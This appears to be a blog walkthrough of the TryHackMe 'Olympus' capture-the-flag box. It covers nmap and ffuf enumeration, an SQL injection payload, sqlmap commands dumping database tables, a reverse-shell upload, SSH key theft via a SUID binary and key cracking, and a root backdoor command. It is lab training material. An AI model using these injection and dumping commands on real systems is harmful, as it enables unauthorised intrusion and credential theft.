Conquer Olympus Using SQL Injection and Claim the Throne in this CTF Found on TryHackMe
This walkthrough covers the Olympus CTF found on TryHackMe. The goal of this challenge is to exploit an SQLi vulnerability in a CMS, use sqlmap to acquire user credentials by extracting a database, identify a subdomain hosting a chat application, upload a reverse shell to establish a foothold on the system and take advantage of a poorly managed SUID binary to escalate privileges.
Step 1: What's Out There?
nmap -sS -sV -sC -p 22,80 olympus.thm --min-rate=1000
Step 2: FFUF
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt:FUZZ -u http://olympus.thm/FUZZ -fc 403
We discovered a directory named ~webmaster
, which is where the CMS is located.
Step 3: SQLi
Testing the Victor CMS search field feature reveals an SQLi:
'SELECT * FROM users WHERE username='' and password='' OR 1=1;
Let's capture this with Burp Suite
and plug it into sqlmap
to automate our injection attack.
Copy this over to a text editor and run it through sqlmap
.
We discovered a flag in olympus, let's dump it.
Let's obtain our first flag.
sqlmap -r req.txt --batch --dump -T flag -D olympus
Now let's see what that user's table can offer us.
Juicy credentials, we can crack the password hash to prometheus and use it to log in to the chat application.
Step 4: Enumerate Subdomain
We discovered three users: root, zeus, and prometheus. Additionally, we discovered a subdomain called chat
that can be added to our /etc/hosts
list.
Let's enumerate the newly discovered subdomain.
I'm sure the uploads directory will play an important role later, in the meantime let's see if we can log in with these credentials.
And we're in. There looks to be an upload feature, let's see if we can upload a reverse shell.
It looks to have been uploaded somewhere, but not sure where. Let's go back to sqlmap
and dump the chats table to see if the file name was changed upon uploading.
sqlmap -r req.txt --batch --dump -T chats -D olympus
Looks like it did. Let's copy this and see if we can visit and go to it using the /uploads/
directory we found earlier.
Going to the path drops us into a shell. Searching for SUID binaries reveals cputils
.
We can copy over zeus id_rsa key
and then ssh in with it.
Crack it using ssh2john
and john-the-ripper
.
Step 5: Privesc and Root
After looking around the file system for a while we discovered this:
Inside the PHP file seems to be a backdoor.
Running uname -a; w; /lib/defended/libc.so.99
drops us into a root shell.
This box was very difficult for me. I don't consider myself to be that knowledgeable on SQLi attacks, so I had to resort to a lot of googling to help me through. I will definitely give this box several more runs as I need to sharpen my command injection skills. As always, Happy Hacking!